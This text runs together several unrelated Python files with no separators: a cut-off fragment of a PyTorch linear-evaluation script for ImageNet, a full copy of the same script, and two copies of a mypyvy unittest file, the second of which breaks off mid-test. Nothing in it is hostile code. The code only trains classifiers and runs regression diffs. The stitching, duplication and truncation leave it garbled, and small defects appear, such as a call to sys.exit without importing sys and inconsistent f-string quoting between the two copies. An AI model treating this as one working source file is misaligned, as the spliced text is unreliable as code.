model.get_intermediate_layers(inp, n) output = [x[:, 0] for x in intermediate_output] if avgpool: output.append(torch.mean(intermediate_output[-1][:, 1:], dim=1)) output = torch.cat(output, dim=-1) else: output = model(inp) output = linear_classifier(output) loss = nn.CrossEntropyLoss()(output, target) if linear_classifier.module.num_labels >= 5: acc1, acc5 = utils.accuracy(output, target, topk=(1, 5)) else: acc1, = utils.accuracy(output, target, topk=(1,)) batch_size = inp.shape[0] metric_logger.update(loss=loss.item()) metric_logger.meters['acc1'].update(acc1.item(), n=batch_size) if linear_classifier.module.num_labels >= 5: metric_logger.meters['acc5'].update(acc5.item(), n=batch_size) if linear_classifier.module.num_labels >= 5: print('* Acc@1 {top1.global_avg:.3f} Acc@5 {top5.global_avg:.3f} loss {losses.global_avg:.3f}' .format(top1=metric_logger.acc1, top5=metric_logger.acc5, losses=metric_logger.loss)) else: print('* Acc@1 {top1.global_avg:.3f} loss {losses.global_avg:.3f}' .format(top1=metric_logger.acc1, losses=metric_logger.loss)) return {k: meter.global_avg for k, meter in metric_logger.meters.items()} class LinearClassifier(nn.Module): """Linear layer to train on top of frozen features""" def __init__(self, dim, num_labels=1000): super(LinearClassifier, self).__init__() self.num_labels = num_labels self.linear = nn.Linear(dim, num_labels) self.linear.weight.data.normal_(mean=0.0, std=0.01) self.linear.bias.data.zero_() def forward(self, x): # flatten x = x.view(x.size(0), -1) # linear layer return self.linear(x) if __name__ == '__main__': parser = argparse.ArgumentParser('Evaluation with linear classification on ImageNet') parser.add_argument('--n_last_blocks', default=4, type=int, help="""Concatenate [CLS] tokens for the `n` last blocks. We use `n=4` when evaluating ViT-Small and `n=1` with ViT-Base.""") parser.add_argument('--avgpool_patchtokens', default=False, type=utils.bool_flag, help="""Whether ot not to concatenate the global average pooled features to the [CLS] token. We typically set this to False for ViT-Small and to True with ViT-Base.""") parser.add_argument('--arch', default='vit_small', type=str, help='Architecture') parser.add_argument('--patch_size', default=16, type=int, help='Patch resolution of the model.') parser.add_argument('--pretrained_weights', default='', type=str, help="Path to pretrained weights to evaluate.") parser.add_argument("--checkpoint_key", default="teacher", type=str, help='Key to use in the checkpoint (example: "teacher")') parser.add_argument('--epochs', default=100, type=int, help='Number of epochs of training.') parser.add_argument("--lr", default=0.001, type=float, help="""Learning rate at the beginning of training (highest LR used during training). The learning rate is linearly scaled with the batch size, and specified here for a reference batch size of 256. We recommend tweaking the LR depending on the checkpoint evaluated.""") parser.add_argument('--batch_size_per_gpu', default=128, type=int, help='Per-GPU batch-size') parser.add_argument("--dist_url", default="env://", type=str, help="""url used to set up distributed training; see https://pytorch.org/docs/stable/distributed.html""") parser.add_argument("--local_rank", default=0, type=int, help="Please ignore and do not set this argument.") parser.add_argument('--data_path', default='/path/to/imagenet/', type=str) parser.add_argument('--num_workers', default=10, type=int, help='Number of data loading workers per GPU.') parser.add_argument('--val_freq', default=1, type=int, help="Epoch frequency for validation.") parser.add_argument('--output_dir', default=".", help='Path to save logs and checkpoints') parser.add_argument('--num_labels', default=1000, type=int, help='Number of labels for linear classifier') args = parser.parse_args() eval_linear(args)
# Copyright (c) Facebook, Inc. and its affiliates. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import argparse import json from pathlib import Path import torch from torch import nn import torch.distributed as dist import torch.backends.cudnn as cudnn from torchvision import datasets from torchvision import transforms as pth_transforms from torchvision import models as torchvision_models import utils import vision_transformer as vits def eval_linear(args): utils.init_distributed_mode(args) print("git:\n {}\n".format(utils.get_sha())) print("\n".join("%s: %s" % (k, str(v)) for k, v in sorted(dict(vars(args)).items()))) cudnn.benchmark = True # ============ preparing data ... ============ train_transform = pth_transforms.Compose([ pth_transforms.RandomResizedCrop(224), pth_transforms.RandomHorizontalFlip(), pth_transforms.ToTensor(), pth_transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)), ]) val_transform = pth_transforms.Compose([ pth_transforms.Resize(256, interpolation=3), pth_transforms.CenterCrop(224), pth_transforms.ToTensor(), pth_transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)), ]) dataset_train = datasets.ImageFolder(os.path.join(args.data_path, "train"), transform=train_transform) dataset_val = datasets.ImageFolder(os.path.join(args.data_path, "val"), transform=val_transform) sampler = torch.utils.data.distributed.DistributedSampler(dataset_train) train_loader = torch.utils.data.DataLoader( dataset_train, sampler=sampler, batch_size=args.batch_size_per_gpu, num_workers=args.num_workers, pin_memory=True, ) val_loader = torch.utils.data.DataLoader( dataset_val, batch_size=args.batch_size_per_gpu, num_workers=args.num_workers, pin_memory=True, ) print(f"Data loaded with {len(dataset_train)} train and {len(dataset_val)} val imgs.") # ============ building network ... ============ # if the network is a Vision Transformer (i.e. vit_tiny, vit_small, vit_base) if args.arch in vits.__dict__.keys(): model = vits.__dict__[args.arch](patch_size=args.patch_size, num_classes=0) embed_dim = model.embed_dim * (args.n_last_blocks + int(args.avgpool_patchtokens)) # if the network is a XCiT elif "xcit" in args.arch: model = torch.hub.load('facebookresearch/xcit', args.arch, num_classes=0) embed_dim = model.embed_dim # otherwise, we check if the architecture is in torchvision models elif args.arch in torchvision_models.__dict__.keys(): model = torchvision_models.__dict__[args.arch]() embed_dim = model.fc.weight.shape[1] model.fc = nn.Identity() else: print(f"Unknow architecture: {args.arch}") sys.exit(1) model.cuda() model.eval() # load weights to evaluate utils.load_pretrained_weights(model, args.pretrained_weights, args.checkpoint_key, args.arch, args.patch_size) print(f"Model {args.arch} built.") linear_classifier = LinearClassifier(embed_dim, num_labels=args.num_labels) linear_classifier = linear_classifier.cuda() linear_classifier = nn.parallel.DistributedDataParallel(linear_classifier, device_ids=[args.gpu]) # set optimizer optimizer = torch.optim.SGD( linear_classifier.parameters(), args.lr * (args.batch_size_per_gpu * utils.get_world_size()) / 256., # linear scaling rule momentum=0.9, weight_decay=0, # we do not apply weight decay ) scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, args.epochs, eta_min=0) # Optionally resume from a checkpoint to_restore = {"epoch": 0, "best_acc": 0.} utils.restart_from_checkpoint( os.path.join(args.output_dir, "checkpoint.pth.tar"), run_variables=to_restore, state_dict=linear_classifier, optimizer=optimizer, scheduler=scheduler, ) start_epoch = to_restore["epoch"] best_acc = to_restore["best_acc"] for epoch in range(start_epoch, args.epochs): train_loader.sampler.set_epoch(epoch) train_stats = train(model, linear_classifier, optimizer, train_loader, epoch, args.n_last_blocks, args.avgpool_patchtokens) scheduler.step() log_stats = {**{f'train_{k}': v for k, v in train_stats.items()}, 'epoch': epoch} if epoch % args.val_freq == 0 or epoch == args.epochs - 1: test_stats = validate_network(val_loader, model, linear_classifier, args.n_last_blocks, args.avgpool_patchtokens) print(f"Accuracy at epoch {epoch} of the network on the {len(dataset_val)} test images: {test_stats['acc1']:.1f}%") best_acc = max(best_acc, test_stats["acc1"]) print(f'Max accuracy so far: {best_acc:.2f}%') log_stats = {**{k: v for k, v in log_stats.items()}, **{f'test_{k}': v for k, v in test_stats.items()}} if utils.is_main_process(): with (Path(args.output_dir) / "log.txt").open("a") as f: f.write(json.dumps(log_stats) + "\n") save_dict = { "epoch": epoch + 1, "state_dict": linear_classifier.state_dict(), "optimizer": optimizer.state_dict(), "scheduler": scheduler.state_dict(), "best_acc": best_acc, } torch.save(save_dict, os.path.join(args.output_dir, "checkpoint.pth.tar")) print("Training of the supervised linear classifier on frozen features completed.\n" "Top-1 test accuracy: {acc:.1f}".format(acc=best_acc)) def train(model, linear_classifier, optimizer, loader, epoch, n, avgpool): linear_classifier.train() metric_logger = utils.MetricLogger(delimiter=" ") metric_logger.add_meter('lr', utils.SmoothedValue(window_size=1, fmt='{value:.6f}')) header = 'Epoch: [{}]'.format(epoch) for (inp, target) in metric_logger.log_every(loader, 20, header): # move to gpu inp = inp.cuda(non_blocking=True) target = target.cuda(non_blocking=True) # forward with torch.no_grad(): if "vit" in args.arch: intermediate_output = model.get_intermediate_layers(inp, n) output = [x[:, 0] for x in intermediate_output] if avgpool: output.append(torch.mean(intermediate_output[-1][:, 1:], dim=1)) output = torch.cat(output, dim=-1) else: output = model(inp) output = linear_classifier(output) # compute cross entropy loss loss = nn.CrossEntropyLoss()(output, target) # compute the gradients optimizer.zero_grad() loss.backward() # step optimizer.step() # log torch.cuda.synchronize() metric_logger.update(loss=loss.item()) metric_logger.update(lr=optimizer.param_groups[0]["lr"]) # gather the stats from all processes metric_logger.synchronize_between_processes() print("Averaged stats:", metric_logger) return {k: meter.global_avg for k, meter in metric_logger.meters.items()} @torch.no_grad() def validate_network(val_loader, model, linear_classifier, n, avgpool): linear_classifier.eval() metric_logger = utils.MetricLogger(delimiter=" ") header = 'Test:' for inp, target in metric_logger.log_every(val_loader, 20, header): # move to gpu inp = inp.cuda(non_blocking=True) target = target.cuda(non_blocking=True) # forward with torch.no_grad(): if "vit" in args.arch: intermediate_output = model.get_intermediate_layers(inp, n) output = [x[:, 0] for x in intermediate_output] if avgpool: output.append(torch.mean(intermediate_output[-1][:, 1:], dim=1)) output = torch.cat(output, dim=-1) else: output = model(inp) output = linear_classifier(output) loss = nn.CrossEntropyLoss()(output, target) if linear_classifier.module.num_labels >= 5: acc1, acc5 = utils.accuracy(output, target, topk=(1, 5)) else: acc1, = utils.accuracy(output, target, topk=(1,)) batch_size = inp.shape[0] metric_logger.update(loss=loss.item()) metric_logger.meters['acc1'].update(acc1.item(), n=batch_size) if linear_classifier.module.num_labels >= 5: metric_logger.meters['acc5'].update(acc5.item(), n=batch_size) if linear_classifier.module.num_labels >= 5: print('* Acc@1 {top1.global_avg:.3f} Acc@5 {top5.global_avg:.3f} loss {losses.global_avg:.3f}' .format(top1=metric_logger.acc1, top5=metric_logger.acc5, losses=metric_logger.loss)) else: print('* Acc@1 {top1.global_avg:.3f} loss {losses.global_avg:.3f}' .format(top1=metric_logger.acc1, losses=metric_logger.loss)) return {k: meter.global_avg for k, meter in metric_logger.meters.items()} class LinearClassifier(nn.Module): """Linear layer to train on top of frozen features""" def __init__(self, dim, num_labels=1000): super(LinearClassifier, self).__init__() self.num_labels = num_labels self.linear = nn.Linear(dim, num_labels) self.linear.weight.data.normal_(mean=0.0, std=0.01) self.linear.bias.data.zero_() def forward(self, x): # flatten x = x.view(x.size(0), -1) # linear layer return self.linear(x) if __name__ == '__main__': parser = argparse.ArgumentParser('Evaluation with linear classification on ImageNet') parser.add_argument('--n_last_blocks', default=4, type=int, help="""Concatenate [CLS] tokens for the `n` last blocks. We use `n=4` when evaluating ViT-Small and `n=1` with ViT-Base.""") parser.add_argument('--avgpool_patchtokens', default=False, type=utils.bool_flag, help="""Whether ot not to concatenate the global average pooled features to the [CLS] token. We typically set this to False for ViT-Small and to True with ViT-Base.""") parser.add_argument('--arch', default='vit_small', type=str, help='Architecture') parser.add_argument('--patch_size', default=16, type=int, help='Patch resolution of the model.') parser.add_argument('--pretrained_weights', default='', type=str, help="Path to pretrained weights to evaluate.") parser.add_argument("--checkpoint_key", default="teacher", type=str, help='Key to use in the checkpoint (example: "teacher")') parser.add_argument('--epochs', default=100, type=int, help='Number of epochs of training.') parser.add_argument("--lr", default=0.001, type=float, help="""Learning rate at the beginning of training (highest LR used during training). The learning rate is linearly scaled with the batch size, and specified here for a reference batch size of 256. We recommend tweaking the LR depending on the checkpoint evaluated.""") parser.add_argument('--batch_size_per_gpu', default=128, type=int, help='Per-GPU batch-size') parser.add_argument("--dist_url", default="env://", type=str, help="""url used to set up distributed training; see https://pytorch.org/docs/stable/distributed.html""") parser.add_argument("--local_rank", default=0, type=int, help="Please ignore and do not set this argument.") parser.add_argument('--data_path', default='/path/to/imagenet/', type=str) parser.add_argument('--num_workers', default=10, type=int, help='Number of data loading workers per GPU.') parser.add_argument('--val_freq', default=1, type=int, help="Epoch frequency for validation.") parser.add_argument('--output_dir', default=".", help='Path to save logs and checkpoints') parser.add_argument('--num_labels', default=1000, type=int, help='Number of labels for linear classifier') args = parser.parse_args() eval_linear(args)
import unittest import utils import parser import syntax import mypyvy import os from pathlib import Path import shlex import subprocess from typing import List PROJECT_ROOT = Path(__file__).resolve().parent.parent class SyntaxTests(unittest.TestCase): def setUp(self) -> None: utils.args = mypyvy.parse_args(['typecheck', 'MOCK_FILENAME.pyv']) def test_as_clauses_basic(self) -> None: ios = [ ('true', ['true | false']), ('foo', ['foo | false']), ('forall N1,N2. grant_msg(N1) & grant_msg(N2) -> N1 = N2', ['forall N1, N2. !grant_msg(N1) | !grant_msg(N2) | N1 = N2']), ('forall N1,N2. !(holds_lock(N1) & grant_msg(N2))', ['forall N1, N2. !holds_lock(N1) | !grant_msg(N2)']), ('forall N. !(unlock_msg(N) & server_holds_lock)', ['forall N. !unlock_msg(N) | !server_holds_lock']), ('!(exists N. holds_lock(N) & server_holds_lock)', ['forall N. !holds_lock(N) | !server_holds_lock']), ('!!(forall X. !(exists Y. (r(X) & s(Y)) & (q(X) & p(Y))))', ['forall X, Y. !r(X) | !s(Y) | !q(X) | !p(Y)']), ('forall X. r(X) & s(X)', ['forall X. r(X) | false', 'forall X. s(X) | false']), ('forall X. (r(X) | s(X)) & (q(X) | p(X))', ['forall X. r(X) | s(X)', 'forall X. q(X) | p(X)']), ] for expr, expected in ios: with self.subTest(expr=expr): clauses = syntax.as_clauses(parser.parse_expr(expr)) # print(clause) self.assertEqual(clauses, [parser.parse_expr(expected_clause) for expected_clause in expected]) def test_as_clauses_fail(self) -> None: egs = [ 'exists X. X = X', ] for expr in egs: with self.subTest(expr=expr): with self.assertRaises(Exception): print(syntax.as_clauses(parser.parse_expr(expr))) def test_as_clauses_lockserv(self) -> None: with open(PROJECT_ROOT / 'examples' / 'lockserv.pyv') as f: prog = mypyvy.parse_program(f.read()) prog.resolve() for inv in prog.invs(): expr = inv.expr with self.subTest(expr=expr): syntax.as_clauses(expr) def test_consistent_hashing(self) -> None: with open(PROJECT_ROOT / 'examples' / 'lockserv.pyv') as f: prog1 = mypyvy.parse_program(f.read()) with open(PROJECT_ROOT / 'examples' / 'lockserv.pyv') as f: prog2 = mypyvy.parse_program(f.read()) prog1.resolve() prog2.resolve() for d1, d2 in zip(prog1.decls_containing_exprs(), prog2.decls_containing_exprs()): e1 = d1.expr e2 = d2.expr with self.subTest(msg='expr hash/eq', e1=e1, e2=e2): self.assertEqual(e1, e2) self.assertEqual(hash(e1), hash(e2)) def test_relativize_quantifiers(self) -> None: minipaxos = ''' sort node sort quorum immutable relation member(node, quorum) mutable relation active_node(node) mutable relation active_quorum(quorum) ''' prog = mypyvy.parse_program(minipaxos) prog.resolve() node = prog.scope.get_sort('node') assert node is not None quorum = prog.scope.get_sort('quorum') assert quorum is not None active_node = prog.scope.get('active_node') assert isinstance(active_node, syntax.RelationDecl) active_quorum = prog.scope.get('active_quorum') assert isinstance(active_quorum, syntax.RelationDecl) guards = {node: active_node, quorum: active_quorum} e = parser.parse_expr('forall Q1, Q2. exists N. member(N, Q1) & member(N, Q2)') e.resolve(prog.scope, None) expected = parser.parse_expr('forall Q1, Q2. active_quorum(Q1) & active_quorum(Q2) -> exists N. active_node(N) & (member(N, Q1) & member(N, Q2))') expected.resolve(prog.scope, None) self.assertEqual(syntax.relativize_quantifiers(guards, e), expected) def build_python_cmd() -> List[str]: python = os.getenv('PYTHON') or 'python3.7' return [python, str((PROJECT_ROOT / 'src' / 'mypyvy.py').resolve())] class RegressionTests(unittest.TestCase): def test_regressions(self) -> None: for p in sorted(Path(PROJECT_ROOT / 'examples' / 'regression').glob('*.pyv')): with self.subTest(testFile=str(p)): with open(p) as f: line = f.readline() magic_prefix = '# MYPYVY: ' assert line.startswith(magic_prefix) line = line[len(magic_prefix):] python = os.getenv('PYTHON') or 'python3.7' out_path = p.with_suffix('.output') expect_path = p.with_suffix('.expect') python_cmd = build_python_cmd() + shlex.split(line) + [str(p)] with open(out_path, 'w') as f_out: subprocess.run(python_cmd, stdout=f_out) diff_cmd = ['diff', '-uw', str(expect_path), str(out_path)] proc = subprocess.run(diff_cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) self.assertEqual(proc.returncode, 0, msg=f'{p} generated output {out_path} which differs from expected output {expect_path}.\n{' '.join(python_cmd)}\n{' '.join(diff_cmd)}') class MonotoneFunctionTests(unittest.TestCase): def setUp(self) -> None: utils.args = mypyvy.parse_args(['typecheck', 'MOCK_FILENAME.pyv']) def test_mononte_function(self) -> None: from pd import MonotoneFunction elems: List[str] = [] mf = MonotoneFunction([(elems,'+')]) with self.assertRaises(Exception): mf[0] # type: ignore with self.assertRaises(Exception): mf[0,] with self.assertRaises(Exception): mf[()] with self.assertRaises(Exception): mf[(),] # type: ignore with self.assertRaises(Exception): mf[[],] # type: ignore with self.assertRaises(Exception): mf[set(),] # type: ignore self.assertIsNone(mf[frozenset(),]) with self.assertRaises(Exception): mf[frozenset([0]),] with self.assertRaises(Exception): mf[frozenset([0,1]),] self.assertEqual( mf.seed([None]), (frozenset(),) ) mf[frozenset(),] = False with self.assertRaises(Exception): mf[frozenset(),] = False with self.assertRaises(Exception): mf[frozenset(),] = True self.assertEqual( mf[frozenset(),], False ) self.assertIsNone(mf.seed([None])) elems.append('hello') self.assertEqual( mf.seed([None]), (frozenset([0]),) ) self.assertIsNone(mf.seed([{0: False}])) self.assertIsNone(mf[frozenset([0]),]) with self.assertRaises(Exception): mf[frozenset([0,1]),] mf[frozenset([0]),] = False with self.assertRaises(Exception): mf[frozenset([0]),] = False with self.assertRaises(Exception): mf[frozenset([0]),] = True self.assertEqual( mf[frozenset([0]),], False ) self.assertIsNone(mf.seed([None])) elems.append('world') self.assertIsNotNone(mf.seed([None])) self.assertIsNone(mf.seed([{1: False}])) mf[frozenset([1]),] = False self.assertEqual( mf.seed([None]), (frozenset([0,1]),) ) mf[frozenset([0,1]),] = True self.assertEqual( mf[frozenset([0,1]),], True ) self.assertIsNone(mf.seed([None])) elems.append('!') self.assertEqual( mf[frozenset([0,1,2]),], True ) self.assertIsNone(mf[frozenset([0,2]),]) self.assertIsNone(mf[frozenset([2]),]) self.assertEqual(mf.to_elems((frozenset(),)), ([],)) self.assertEqual(mf.to_elems((frozenset([0]),)), (['hello'],)) self.assertEqual(mf.to_elems((frozenset([0,1]),)), (['hello', 'world'],)) self.assertEqual(mf.to_elems((frozenset([1,0]),)), (['hello', 'world'],)) self.assertEqual(mf.to_elems((frozenset([0,2]),)), (['hello', '!'],)) with self.assertRaises(Exception): mf.to_elems((frozenset([3]),)) mf = MonotoneFunction([(None, '+')]) with self.assertRaises(Exception): mf[0] # type: ignore with self.assertRaises(Exception): mf[frozenset(),] with self.assertRaises(Exception): mf[()] with self.assertRaises(Exception): mf[(),] # type: ignore with self.assertRaises(Exception): mf[[],] # type: ignore with self.assertRaises(Exception): mf[set(),] # type: ignore self.assertIsNone(mf[0,]) with self.assertRaises(Exception): mf[-1,] self.assertIsNone(mf.seed([(0,0)])) self.assertIsNone(mf.seed([(None,0)])) self.assertIsNotNone(mf.seed([(None,None)])) self.assertIsNotNone(mf.seed([(100,None)])) v = mf.seed([(100,200)]) self.assertIsNotNone(v) assert v is not None k = v[0] self.assertIsInstance(k, int) self.assertLessEqual(100, k) self.assertLess(k, 200) self.assertIsNone(mf.seed([(5,5)])) self.assertEqual(mf.seed([(5,6)]), (5,)) mf[5,] = False self.assertIsNone(mf.seed([(None,6)])) mf[50,] = True self.assertIsNone(mf.seed([(50,None)])) self.assertEqual(mf.seed([(None,7)]), (6,)) self.assertEqual(mf.seed([(49,None)]), (49,)) with self.assertRaises(Exception): mf[None,] = True with self.assertRaises(Exception): mf[None,] = False elems = [] mf = MonotoneFunction([(elems,'-')]) with self.assertRaises(Exception): mf[0] # type: ignore with self.assertRaises(Exception): mf[0,] with self.assertRaises(Exception): mf[()] with self.assertRaises(Exception): mf[(),] # type: ignore with self.assertRaises(Exception): mf[[],] # type: ignore with self.assertRaises(Exception): mf[set(),] # type: ignore self.assertIsNone(mf[frozenset(),]) with self.assertRaises(Exception): mf[frozenset([0]),] with self.assertRaises(Exception): mf[frozenset([0,1]),] self.assertEqual( mf.seed([None]), (frozenset(),) ) mf[frozenset(),] = True with self.assertRaises(Exception): mf[frozenset(),] = False with self.assertRaises(Exception): mf[frozenset(),] = True self.assertEqual( mf[frozenset(),], True ) self.assertIsNone(mf.seed([None])) elems.append('hello') self.assertEqual( mf.seed([None]), (frozenset([0]),) ) self.assertIsNone(mf.seed([{0: False}])) self.assertIsNone(mf[frozenset([0]),]) with self.assertRaises(Exception): mf[frozenset([0,1]),] mf[frozenset([0]),] = True with self.assertRaises(Exception): mf[frozenset([0]),] = False with self.assertRaises(Exception): mf[frozenset([0]),] = True self.assertEqual( mf[frozenset([0]),], True ) self.assertIsNone(mf.seed([None])) elems.append('world') self.assertIsNotNone(mf.seed([None])) self.assertIsNone(mf.seed([{1: False}])) mf[frozenset([1]),] = True self.assertEqual( mf.seed([None]), (frozenset([0,1]),) ) mf[frozenset([0,1]),] = False self.assertEqual( mf[frozenset([0,1]),], False ) self.assertIsNone(mf.seed([None])) elems.append('!') self.assertEqual( mf[frozenset([0,1,2]),], False ) self.assertIsNone(mf[frozenset([0,2]),]) self.assertIsNone(mf[frozenset([2]),]) self.assertEqual(mf.to_elems((frozenset(),)), ([],)) self.assertEqual(mf.to_elems((frozenset([0]),)), (['hello'],)) self.assertEqual(mf.to_elems((frozenset([0,1]),)), (['hello', 'world'],)) self.assertEqual(mf.to_elems((frozenset([1,0]),)), (['hello', 'world'],)) self.assertEqual(mf.to_elems((frozenset([0,2]),)), (['hello', '!'],)) with self.assertRaises(Exception): mf.to_elems((frozenset([3]),)) # TODO: test multiple domains together, more tests with infinity
import unittest import utils import parser import syntax import mypyvy import os from pathlib import Path import shlex import subprocess from typing import List PROJECT_ROOT = Path(__file__).resolve().parent.parent class SyntaxTests(unittest.TestCase): def setUp(self) -> None: utils.args = mypyvy.parse_args(['typecheck', 'MOCK_FILENAME.pyv']) def test_as_clauses_basic(self) -> None: ios = [ ('true', ['true | false']), ('foo', ['foo | false']), ('forall N1,N2. grant_msg(N1) & grant_msg(N2) -> N1 = N2', ['forall N1, N2. !grant_msg(N1) | !grant_msg(N2) | N1 = N2']), ('forall N1,N2. !(holds_lock(N1) & grant_msg(N2))', ['forall N1, N2. !holds_lock(N1) | !grant_msg(N2)']), ('forall N. !(unlock_msg(N) & server_holds_lock)', ['forall N. !unlock_msg(N) | !server_holds_lock']), ('!(exists N. holds_lock(N) & server_holds_lock)', ['forall N. !holds_lock(N) | !server_holds_lock']), ('!!(forall X. !(exists Y. (r(X) & s(Y)) & (q(X) & p(Y))))', ['forall X, Y. !r(X) | !s(Y) | !q(X) | !p(Y)']), ('forall X. r(X) & s(X)', ['forall X. r(X) | false', 'forall X. s(X) | false']), ('forall X. (r(X) | s(X)) & (q(X) | p(X))', ['forall X. r(X) | s(X)', 'forall X. q(X) | p(X)']), ] for expr, expected in ios: with self.subTest(expr=expr): clauses = syntax.as_clauses(parser.parse_expr(expr)) # print(clause) self.assertEqual(clauses, [parser.parse_expr(expected_clause) for expected_clause in expected]) def test_as_clauses_fail(self) -> None: egs = [ 'exists X. X = X', ] for expr in egs: with self.subTest(expr=expr): with self.assertRaises(Exception): print(syntax.as_clauses(parser.parse_expr(expr))) def test_as_clauses_lockserv(self) -> None: with open(PROJECT_ROOT / 'examples' / 'lockserv.pyv') as f: prog = mypyvy.parse_program(f.read()) prog.resolve() for inv in prog.invs(): expr = inv.expr with self.subTest(expr=expr): syntax.as_clauses(expr) def test_consistent_hashing(self) -> None: with open(PROJECT_ROOT / 'examples' / 'lockserv.pyv') as f: prog1 = mypyvy.parse_program(f.read()) with open(PROJECT_ROOT / 'examples' / 'lockserv.pyv') as f: prog2 = mypyvy.parse_program(f.read()) prog1.resolve() prog2.resolve() for d1, d2 in zip(prog1.decls_containing_exprs(), prog2.decls_containing_exprs()): e1 = d1.expr e2 = d2.expr with self.subTest(msg='expr hash/eq', e1=e1, e2=e2): self.assertEqual(e1, e2) self.assertEqual(hash(e1), hash(e2)) def test_relativize_quantifiers(self) -> None: minipaxos = ''' sort node sort quorum immutable relation member(node, quorum) mutable relation active_node(node) mutable relation active_quorum(quorum) ''' prog = mypyvy.parse_program(minipaxos) prog.resolve() node = prog.scope.get_sort('node') assert node is not None quorum = prog.scope.get_sort('quorum') assert quorum is not None active_node = prog.scope.get('active_node') assert isinstance(active_node, syntax.RelationDecl) active_quorum = prog.scope.get('active_quorum') assert isinstance(active_quorum, syntax.RelationDecl) guards = {node: active_node, quorum: active_quorum} e = parser.parse_expr('forall Q1, Q2. exists N. member(N, Q1) & member(N, Q2)') e.resolve(prog.scope, None) expected = parser.parse_expr('forall Q1, Q2. active_quorum(Q1) & active_quorum(Q2) -> exists N. active_node(N) & (member(N, Q1) & member(N, Q2))') expected.resolve(prog.scope, None) self.assertEqual(syntax.relativize_quantifiers(guards, e), expected) def build_python_cmd() -> List[str]: python = os.getenv('PYTHON') or 'python3.7' return [python, str((PROJECT_ROOT / 'src' / 'mypyvy.py').resolve())] class RegressionTests(unittest.TestCase): def test_regressions(self) -> None: for p in sorted(Path(PROJECT_ROOT / 'examples' / 'regression').glob('*.pyv')): with self.subTest(testFile=str(p)): with open(p) as f: line = f.readline() magic_prefix = '# MYPYVY: ' assert line.startswith(magic_prefix) line = line[len(magic_prefix):] python = os.getenv('PYTHON') or 'python3.7' out_path = p.with_suffix('.output') expect_path = p.with_suffix('.expect') python_cmd = build_python_cmd() + shlex.split(line) + [str(p)] with open(out_path, 'w') as f_out: subprocess.run(python_cmd, stdout=f_out) diff_cmd = ['diff', '-uw', str(expect_path), str(out_path)] proc = subprocess.run(diff_cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) self.assertEqual(proc.returncode, 0, msg=f'{p} generated output {out_path} which differs from expected output {expect_path}.\n{" ".join(python_cmd)}\n{" ".join(diff_cmd)}') class MonotoneFunctionTests(unittest.TestCase): def setUp(self) -> None: utils.args = mypyvy.parse_args(['typecheck', 'MOCK_FILENAME.pyv']) def test_mononte_function(self) -> None: from pd import MonotoneFunction elems: List[str] = [] mf = MonotoneFunction([(elems,'+')]) with self.assertRaises(Exception): mf[0] # type: ignore with self.assertRaises(Exception): mf[0,] with self.assertRaises(Exception): mf[()] with self.assertRaises(Exception): mf[(),] # type: ignore with self.assertRaises(Exception): mf[[],] # type: ignore with self.assertRaises(Exception): mf[set(),] # type: ignore self.assertIsNone(mf[frozenset(),]) with self.assertRaises(Exception): mf[frozenset([0]),] with self.assertRaises(Exception): mf[frozenset([0,1]),] self.assertEqual( mf.seed([None]), (frozenset(),) ) mf[frozenset(),] = False with self.assertRaises(Exception): mf[frozenset(),] = False with self.assertRaises(Exception): mf[frozenset(),] = True self.assertEqual( mf[frozenset(),], False ) self.assertIsNone(mf.seed([None])) elems.append('hello') self.assertEqual( mf.seed([None]), (frozenset([0]),) ) self.assertIsNone(mf.seed([{0: False}])) self.assertIsNone(mf[frozenset([0]),]) with self.assertRaises(Exception): mf[frozenset([0,1]),] mf[frozenset([0]),] = False with self.assertRaises(Exception): mf[frozenset([0]),] = False with self.assertRaises(Exception): mf[frozenset([0]),] = True self.assertEqual( mf[frozenset([0]),], False ) self.assertIsNone(mf.seed([None])) elems.append('world') self.assertIsNotNone(mf.seed([None])) self.assertIsNone(mf.seed([{1: False}])) mf[frozenset([1]),] = False self.assertEqual( mf.seed([None]), (frozenset([0,1]),) ) mf[frozenset([0,1]),] = True self.assertEqual( mf[frozenset([0,1]),], True ) self.assertIsNone(mf.seed([None])) elems.append('!') self.assertEqual( mf[frozenset([0,1,2]),], True ) self.assertIsNone(mf[frozenset([0,2]),]) self.assertIsNone(mf[frozenset([2]),]) self.assertEqual(mf.to_elems((frozenset(),)), ([],)) self.assertEqual(mf.to_elems((frozenset([0]),)), (['hello'],)) self.assertEqual(mf.to_elems((frozenset([0,1]),)), (['hello', 'world'],)) self.assertEqual(mf.to_elems((frozenset([1,0]),)), (['hello', 'world'],)) self.assertEqual(mf.to_elems((frozenset([0,2]),)), (['hello', '!'],)) with self.assertRaises(Exception): mf.to_elems((frozenset([3]),)) mf = MonotoneFunction([(None, '+')]) with self.assertRaises(Exception): mf[0] # type: ignore with self.assertRaises(Exception): mf[frozenset(),] with self.assertRaises(Exception): mf[()] with self.assertRaises(Exception): mf[(),] # type: ignore with self.assertRaises(Exception): mf[[],] # type: ignore with self.assertRaises(Exception): mf[set(),] # type: ignore self.assertIsNone(mf[0,]) with self.assertRaises(Exception): mf[-1,] self.assertIsNone(mf.seed([(0,0)])) self.assertIsNone(mf.seed([(None,0)])) self.assertIsNotNone(mf.seed([(None,None)])) self.assertIsNotNone(mf.seed([(100,None)])) v = mf.seed([(100,200)]) self.assertIsNotNone(v) assert v is not None k = v[0] self.assertIsInstance(k, int) self.assertLessEqual(100, k) self.assertLess(k, 200) self.assertIsNone(mf.seed([(5,5)])) self.assertEqual(mf.seed([(5,6)]), (5,)) mf[5,] = False self.assertIsNone(mf.seed([(None,6)])) mf[50,] = True self.assertIsNone(mf.seed([(50,None)])) self.assertEqual(mf.seed([(None,7)]), (6,)) self.assertEqual(mf.seed([(49,None)]), (49,)) with self.assertRaises(Exception): mf[None,] = True with self.assertRaises(Exception): mf[None,] = False elems = [] mf = MonotoneFunction([(elems,'-')]) with self.assertRaises(Exception): mf[0] # type: ignore with self.assertRaises(Exception): mf[0,] with self.assertRaises(Exception): mf[()] with 